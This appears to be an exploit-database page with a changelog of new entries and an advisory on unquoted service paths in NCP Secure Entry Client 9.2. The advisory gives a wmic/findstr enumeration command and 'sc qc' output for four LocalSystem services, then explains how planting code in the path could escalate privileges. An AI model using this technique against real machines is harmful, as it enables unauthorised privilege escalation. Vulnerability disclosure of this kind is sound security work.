3e9ff5a927
13 changes to exploits/shellcodes iSmartViewPro 1.3.34 - Denial of Service (PoC) Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path MobileGo 8.5.0 - Insecure File Permissions NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths nipper-ng 0.11.10 - Remote Buffer Overflow (PoC) Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal Crystal Live HTTP Server 6.01 - Directory Traversal Centova Cast 3.2.11 - Arbitrary File Download TemaTres 3.0 - Cross-Site Request Forgery (Add Admin) TemaTres 3.0 - 'value' Persistent Cross-site Scripting
85 lines
No EOL
3.5 KiB
Text
85 lines
No EOL
3.5 KiB
Text
# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
|
|
# Date: 2019-11-17
|
|
# Exploit Author: Akif Mohamed Ik
|
|
# Vendor Homepage: http://software.ncp-e.com/
|
|
# Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
|
|
# Version: 9.2x
|
|
# Tested on: Windows 7 SP1
|
|
# CVE : NA
|
|
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
|
|
|
|
ncprwsnt ncprwsnt
|
|
C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
|
|
Auto
|
|
rwsrsu rwsrsu
|
|
C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
|
|
Auto
|
|
ncpclcfg ncpclcfg
|
|
C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
|
|
Auto
|
|
NcpSec NcpSec
|
|
C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
|
|
Auto
|
|
|
|
C:\Users\ADMIN>sc qc ncprwsnt
|
|
[SC] QueryServiceConfig SUCCESS
|
|
SERVICE_NAME: ncprwsnt
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : ncprwsnt
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\Users\ADMIN>sc qc rwsrsu
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME : rwsrsu
|
|
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : rwsrsu
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\Users\ADMIN>sc qc ncpclcfg
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME : ncpclcfg
|
|
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : ncpclcfg
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\Users\ADMIN>sc qc NcpSec
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME : NcpSec
|
|
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : NcpSec
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
#Exploit:
|
|
|
|
A successful attempt would require the local user to be able to insert
|
|
their code in the system root path undetected by the OS or other
|
|
security applications where it could potentially be executed during
|
|
application startup or reboot. If successful, the local user's code
|
|
would execute with the elevated privileges of the application. |